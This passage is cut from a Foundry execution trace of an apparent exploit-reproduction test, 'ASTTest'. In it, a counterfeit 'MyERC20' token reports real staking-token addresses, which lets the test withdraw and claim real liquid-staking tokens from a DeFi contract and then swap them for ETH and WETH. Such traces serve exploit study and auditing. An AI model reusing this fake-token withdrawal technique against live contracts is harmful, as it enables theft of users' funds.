    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [88349] 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70::claim(1)
    │   ├─ [87823] 0x4D5B4B9Ccf52bBcFE7B71b3038D8577293779E0C::claim(1) [delegatecall]
    │   │   ├─ [654] MyERC20::stakedTokenAddress() [staticcall]
    │   │   │   └─ ← [Return] 0xae78736Cd615f374D3085123A210448E74Fc6393
    │   │   ├─ [35825] 0xae78736Cd615f374D3085123A210448E74Fc6393::transfer(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 39165842900855519099 [3.916e19])
    │   │   │   ├─ [2473] 0x1d8f8f00cfa6758d7bE78336684788Fb0ee0Fa46::getUint(0xdb6154e130fa18e576b7f99ad2cf6c1643834245426facf16cc68c0b21ecf3ef) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ emit Transfer(from: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, to: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 39165842900855519099 [3.916e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000000021f89069bda3f777b
    │   │   │   │   @ 0xa2d31b3d5aa2f8a8f7a95a9a3256c1687bc49f41972c2b1c83141ba6d08741e1: 0x0000000000000000000000000000000000000000000000021f89069bda3f777b → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ emit WithdrawalClaimed(param0: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 13)
    │   │   ├─  storage changes:
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0376: 0x00000000000000000000000000000000000000000000000000000001197f2701 → 0x00000000000000000000000000000000000000000000000000000001197f2702
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29072: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2906f: 0x00000000000000000000000000000000000000000000000000000001197f2701 → 0x00000000000000000000000000000000000000000000000000000001197f2702
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0379: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x6cb86f5321f81c1c82ae55dbf56ca2af0cdc318d4d114735ab2f77f8d14d1480: 0x0000000000000000000000000000000000000000000000021f89069bda3f777b → 0
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [9726] 0xBe9895146f7AF43049ca1c1AE358B0541Ea49704::balanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   ├─ [2529] 0x31724cA0C982A31fbb5C57f4217AB585271fc9a5::balanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [delegatecall]
    │   │   └─ ← [Return] 20000407064566313222 [2e19]
    │   └─ ← [Return] 20000407064566313222 [2e19]
    ├─ [602106] → new MyERC20@0xF62849F9A0B5Bf2913b396098F7c7019b51A820a
    │   ├─  storage changes:
    │   │   @ 4: 0 → 0x000000000000000000000000000000000000000000000001158fb8422eb03106
    │   │   @ 3: 0 → 0x0000000000000000000000be9895146f7af43049ca1c1ae358b0541ea4970412
    │   └─ ← [Return] 2782 bytes of code
    ├─ [47107] MyERC20::mint(10000000000000000000000 [1e22])
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10000000000000000000000 [1e22])
    │   ├─  storage changes:
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   @ 0: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   └─ ← [Stop]
    ├─ [25056] MyERC20::approve(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x3e7d76ec893a25d90366b2467df0ae7e96bbd0f5ae48ca3e265bc7e1ad3111f3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [487770] 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70::withdraw(MyERC20: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], 20000407064566313222 [2e19])
    │   ├─ [487241] 0x4D5B4B9Ccf52bBcFE7B71b3038D8577293779E0C::withdraw(MyERC20: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], 20000407064566313222 [2e19]) [delegatecall]
    │   │   ├─ [847] MyERC20::balanceOf(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 10000000000000000000000 [1e22]
    │   │   ├─ [1147] MyERC20::allowance(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   │   │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    │   │   ├─ [685] MyERC20::scaledBalanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [26555] MyERC20::transferFrom(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, 20000407064566313222 [2e19])
    │   │   │   ├─ emit Transfer(from: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, value: 20000407064566313222 [2e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3e7d76ec893a25d90366b2467df0ae7e96bbd0f5ae48ca3e265bc7e1ad3111f3: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffeea7047bdd14fcef9
    │   │   │   │   @ 0xa2d31b3d5aa2f8a8f7a95a9a3256c1687bc49f41972c2b1c83141ba6d08741e1: 0 → 0x000000000000000000000000000000000000000000000001158fb8422eb03106
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0x00000000000000000000000000000000000000000000021d04511178838fcefa
    │   │   │   └─ ← [Return] true
    │   │   ├─ [685] MyERC20::scaledBalanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─  emit topic 0: 0x196e6601eb68141737e4636af773e3013089d698090efd395ba859863e1f2f9c
    │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │           data: 0x000000000000000000000000f62849f9a0b5bf2913b396098f7c7019b51a820a000000000000000000000000000000000000000000000001158fb8422eb031060000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [654] MyERC20::stakedTokenAddress() [staticcall]
    │   │   │   └─ ← [Return] 0xBe9895146f7AF43049ca1c1AE358B0541Ea49704
    │   │   ├─ [716] MyERC20::scaledBalanceToBalance(0) [staticcall]
    │   │   │   └─ ← [Return] 20000407064566313222 [2e19]
    │   │   ├─ [1226] 0xBe9895146f7AF43049ca1c1AE358B0541Ea49704::balanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   │   │   ├─ [529] 0x31724cA0C982A31fbb5C57f4217AB585271fc9a5::balanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [delegatecall]
    │   │   │   │   └─ ← [Return] 20000407064566313222 [2e19]
    │   │   │   └─ ← [Return] 20000407064566313222 [2e19]
    │   │   ├─ [3505] MyERC20::burn(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, 20000407064566313222 [2e19])
    │   │   │   ├─ emit Transfer(from: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, to: 0x0000000000000000000000000000000000000000, value: 20000407064566313222 [2e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0x00000000000000000000000000000000000000000000021d04511178838fcefa
    │   │   │   │   @ 0xa2d31b3d5aa2f8a8f7a95a9a3256c1687bc49f41972c2b1c83141ba6d08741e1: 0x000000000000000000000000000000000000000000000001158fb8422eb03106 → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit WithdrawalProcessed(: 14)
    │   │   ├─  storage changes:
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2907b: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2907f: 0 → 2
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f037c: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0381: 0 → 0x00000000000000000000000000000000000000000000000000000001197f2701
    │   │   │   @ 0x1b8dad150c4e78d67486c607270f99db043ce96498304a7a54f2625d2eb9086c: 2 → 3
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0380: 0 → 0x000000000000000000000000000000000000000000000001158fb8422eb03106
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2907c: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29077: 0 → 0x000000000000000000000000000000000000000000000001158fb8422eb03106
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29076: 0 → 0x000000000000000000000000f62849f9a0b5bf2913b396098f7c7019b51a820a
    │   │   │   @ 310: 14 → 15
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29075: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0x00000000000000000000000000000000000000000000021d04511178838fcefa
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0383: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2907a: 0 → 0x00000000000000000000000000000000000000000000000000000001197f2701
    │   │   │   @ 0xf66faef7610f95de08b78613b9921cda46b0680f580a555e72005517d9176c5c: 0 → 0x000000000000000000000000000000000000000000000001158fb8422eb03106
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0385: 0 → 14
    │   │   │   @ 311: 14 → 15
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29079: 0 → 0x000000000000000000000000000000000000000000000001158fb8422eb03106
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2907e: 0 → 14
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f037d: 0 → 0x000000000000000000000000f62849f9a0b5bf2913b396098f7c7019b51a820a
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0386: 0 → 2
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0382: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f037e: 0 → 0x000000000000000000000000000000000000000000000001158fb8422eb03106
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [87907] 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70::claim(2)
    │   ├─ [87381] 0x4D5B4B9Ccf52bBcFE7B71b3038D8577293779E0C::claim(2) [delegatecall]
    │   │   ├─ [654] MyERC20::stakedTokenAddress() [staticcall]
    │   │   │   └─ ← [Return] 0xBe9895146f7AF43049ca1c1AE358B0541Ea49704
    │   │   ├─ [35383] 0xBe9895146f7AF43049ca1c1AE358B0541Ea49704::transfer(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 20000407064566313222 [2e19])
    │   │   │   ├─ [34683] 0x31724cA0C982A31fbb5C57f4217AB585271fc9a5::transfer(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 20000407064566313222 [2e19]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, to: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 20000407064566313222 [2e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x88d05f36a45211c4dc6f2f386a36f34b359bdd4decdad24c342cffd499f5ed8a: 0x000000000000000000000000000000000000000000000001158fb8422eb03106 → 0
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000000001158fb8422eb03106
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ emit WithdrawalClaimed(param0: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 14)
    │   │   ├─  storage changes:
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0384: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2907a: 0x00000000000000000000000000000000000000000000000000000001197f2701 → 0x00000000000000000000000000000000000000000000000000000001197f2702
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0381: 0x00000000000000000000000000000000000000000000000000000001197f2701 → 0x00000000000000000000000000000000000000000000000000000001197f2702
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2907d: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0xf66faef7610f95de08b78613b9921cda46b0680f580a555e72005517d9176c5c: 0x000000000000000000000000000000000000000000000001158fb8422eb03106 → 0
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [28142] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::approve(0xDC24316b9AE028F1497c275EB9192a3Ea0f67022, 64176037513415148812 [6.417e19])
    │   ├─ [1763] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   ├─ [820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   ├─ [24756] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::approve(0xDC24316b9AE028F1497c275EB9192a3Ea0f67022, 64176037513415148812 [6.417e19]) [delegatecall]
    │   │   ├─ emit Approval(owner: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022, value: 64176037513415148812 [6.417e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x29084008e96b161a41a18c1e36380bcd328a9e87c876663012548487b28164a1: 0 → 0x0000000000000000000000000000000000000000000000037a9f16196740c50c
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [90944] 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022::exchange(1, 0, 64176037513415148812 [6.417e19], 0)
    │   ├─ [8468] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::balanceOf(0xDC24316b9AE028F1497c275EB9192a3Ea0f67022) [staticcall]
    │   │   ├─ [1763] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   │   ├─ [820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   ├─ [5088] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::balanceOf(0xDC24316b9AE028F1497c275EB9192a3Ea0f67022) [delegatecall]
    │   │   │   └─ ← [Return] 60498577684550166430717 [6.049e22]
    │   │   └─ ← [Return] 60498577684550166430717 [6.049e22]
    │   ├─ [17209] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::transferFrom(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022, 64176037513415148812 [6.417e19])
    │   │   ├─ [1763] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   │   ├─ [820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   ├─ [13817] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::transferFrom(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022, 64176037513415148812 [6.417e19]) [delegatecall]
    │   │   │   ├─ emit Approval(owner: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022, value: 0)
    │   │   │   ├─ emit Transfer(from: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022, value: 64176037513415148812 [6.417e19])
    │   │   │   ├─ emit TransferShares(param0: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022, param2: 56078111362990188396 [5.607e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x29084008e96b161a41a18c1e36380bcd328a9e87c876663012548487b28164a1: 0x0000000000000000000000000000000000000000000000037a9f16196740c50c → 0
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000030a3d792b89d3a76c → 0
    │   │   │   │   @ 0xae68078d7ee25b2b7bcb7d4b9fe9acf61f251fe08ff637df07889375d8385158: 0x000000000000000000000000000000000000000000000b31ccdfcf17c2a8d686 → 0x000000000000000000000000000000000000000000000b34d71d48434c7c7df2
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [18] PRECOMPILES::identity(0x0000000000000000000000000000000000000000000000000000000000000000)
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [55] ASTTest::receive{value: 64158750839795105151}()
    │   │   └─ ← [Stop]
    │   ├─ emit TokenExchange(param0: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 1, param2: 64176037513415148812 [6.417e19], param3: 0, param4: 64158750839795105151 [6.415e19])
    │   ├─  storage changes:
    │   │   @ 0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6: 0x0000000000000000000000000000000000000000000000000495ccbc19ed4eb7 → 0x00000000000000000000000000000000000000000000000004a132a0f649f920
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000037a61abf60ec83d7f
    ├─ [24538] 0xae78736Cd615f374D3085123A210448E74Fc6393::approve(0xa4e0faA58465A2D369aa21B3e42d43374c6F9613, 39165842900855519099 [3.916e19])
    │   ├─ emit Approval(owner: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xa4e0faA58465A2D369aa21B3e42d43374c6F9613, value: 39165842900855519099 [3.916e19])
    │   ├─  storage changes:
    │   │   @ 0x9b17c11b8c736fed301c5954963356224d33dfeb95b10804f1c9fd4fcdc3f6e9: 0 → 0x0000000000000000000000000000000000000000000000021f89069bda3f777b
    │   └─ ← [Return] true
    ├─ [118938] 0xa4e0faA58465A2D369aa21B3e42d43374c6F9613::swap(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true, 39165842900855519099 [3.916e19], 4295128740 [4.295e9], 0x)
    │   ├─ [29962] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 42618102617683845956 [4.261e19])
    │   │   ├─ emit Transfer(from: 0xa4e0faA58465A2D369aa21B3e42d43374c6F9613, to: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 42618102617683845956 [4.261e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000024f71ea87c830e344
    │   │   │   @ 0xa080044600fddd91662b08a483b794ba2467971495dda5b7b8ff652e790a6b44: 0x00000000000000000000000000000000000000000000005ada0c3d4fe560bc45 → 0x0000000000000000000000000000000000000000000000588a9a52c81d2fd901
    │   │   └─ ← [Return] true
    │   ├─ [2486] 0xae78736Cd615f374D3085123A210448E74Fc6393::balanceOf(0xa4e0faA58465A2D369aa21B3e42d43374c6F9613) [staticcall]
    │   │   └─ ← [Return] 832491155680765121905 [8.324e20]
    │   ├─ [11945] ASTTest::uniswapV3SwapCallback(39165842900855519099 [3.916e19], -42618102617683845956 [-4.261e19], 0x)
    │   │   ├─ [266] 0xa4e0faA58465A2D369aa21B3e42d43374c6F9613::token0() [staticcall]
    │   │   │   └─ ← [Return] 0xae78736Cd615f374D3085123A210448E74Fc6393
    │   │   ├─ [9425] 0xae78736Cd615f374D3085123A210448E74Fc6393::transfer(0xa4e0faA58465A2D369aa21B3e42d43374c6F9613, 39165842900855519099 [3.916e19])
    │   │   │   ├─ [2473] 0x1d8f8f00cfa6758d7bE78336684788Fb0ee0Fa46::getUint(0x26823a8a8810f55cd0ba19990304dbe1d99116ae953b652c926a7770c41fc679) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ emit Transfer(from: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xa4e0faA58465A2D369aa21B3e42d43374c6F9613, value: 39165842900855519099 [3.916e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000021f89069bda3f777b → 0
    │   │   │   │   @ 0xade73a0c5f2cda18d31cf073c2e5b59aaac3263aff09c9cf00f770bc33babb59: 0x00000000000000000000000000000000000000000000002d2122b75d4e6b9571 → 0x00000000000000000000000000000000000000000000002f40abbdf928ab0cec
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [486] 0xae78736Cd615f374D3085123A210448E74Fc6393::balanceOf(0xa4e0faA58465A2D369aa21B3e42d43374c6F9613) [staticcall]
    │   │   └─ ← [Return] 871656998581620641004 [8.716e20]
    │   ├─ emit Swap(param0: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 39165842900855519099 [3.916e19], param3: -42618102617683845956 [-4.261e19], param4: 82665435221792649000676825704 [8.266e28], param5: 1240109005533693388405697 [1.24e24], param6: 849)
    │   ├─  storage changes:
    │   │   @ 4: 0x000000000000000000000000000000000000000000004948140ee7dc855c1e28 → 0x00000000000000000000000000000000000000000001069a71a329ca014a3bc1
    │   │   @ 1: 0x000000000000000000000000000000000075f0c4b23b46d2ebdafd53089ae834 → 0x000000000000000000000000000000000075f1220d71946cbfb6095d55cef556
    │   │   @ 0x6c56ad08f245f4177c3697aaee5b7e4575c44715cbd0f4a208281b66488a24ca: 0x000000000000000000000000000000000080fc003f8f62a831b4b7d3eb7acf48 → 0x0000000000000000000000000000000000116ba069688fafa05c90fe208e3500
    │   │   @ 0x6c56ad08f245f4177c3697aaee5b7e4575c44715cbd0f4a208281b66488a24cb: 0x016536d32f000000000000000000146b76830180867a5448020000066fedbc6a → 0x010006122400000000000000000000005169cd61bbdaebdb6b0000001486bb4c
    │   │   @ 0: 0x00010000960096001300035200000000000000010b1e58734f7eb198c2fddb46 → 0x00010000960096001400035100000000000000010b1b3eced8ab772b591d1a68
    │   │   @ 28: 0x01000000000000000000146b811be5c99660af61d000000612b5cae2651a00a3 → 0x01000000000000000000146bc7eccee2425540236d000006847477b6653ce553
    │   │   @ 0x6c56ad08f245f4177c3697aaee5b7e4575c44715cbd0f4a208281b66488a24c9: 0x0000000000000000000000000000000000670bfe63044fddfb96b06b4fbdf99f → 0x00000000000000000000000000000000000ee4e9b9d4e05914c118c640634e39
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000021f89069bda3f777bfffffffffffffffffffffffffffffffffffffffffffffffdb08e157837cf1cbc
    ├─ [27746] 0xBe9895146f7AF43049ca1c1AE358B0541Ea49704::approve(0x840DEEef2f115Cf50DA625F7368C24af6fE74410, 20000407064566313222 [2e19])
    │   ├─ [27078] 0x31724cA0C982A31fbb5C57f4217AB585271fc9a5::approve(0x840DEEef2f115Cf50DA625F7368C24af6fE74410, 20000407064566313222 [2e19]) [delegatecall]
    │   │   ├─ emit Approval(owner: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x840DEEef2f115Cf50DA625F7368C24af6fE74410, value: 20000407064566313222 [2e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x3b9b5d149284f029f0dd6eb4d3b305e8eb963f578fb281459f4c0adb6394143e: 0 → 0x000000000000000000000000000000000000000000000001158fb8422eb03106
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [63359] 0x840DEEef2f115Cf50DA625F7368C24af6fE74410::swap(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true, 20000407064566313222 [2e19], 4295128740 [4.295e9], 0x)
    │   ├─ [8062] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 21020645622463912471 [2.102e19])
    │   │   ├─ emit Transfer(from: 0x840DEEef2f115Cf50DA625F7368C24af6fE74410, to: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 21020645622463912471 [2.102e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000024f71ea87c830e344 → 0x000000000000000000000000000000000000000000000003732a405a1485bd5b
    │   │   │   @ 0x54e90f8f697f70d3073cc6b21c5d9694b40f346ff3cda150122ba99bdb1585a8: 0x000000000000000000000000000000000000000000000030dc9c1661bc71f5ce → 0x00000000000000000000000000000000000000000000002fb8e3c08f701d1bb7
    │   │   └─ ← [Return] true
    │   ├─ [3226] 0xBe9895146f7AF43049ca1c1AE358B0541Ea49704::balanceOf(0x840DEEef2f115Cf50DA625F7368C24af6fE74410) [staticcall]
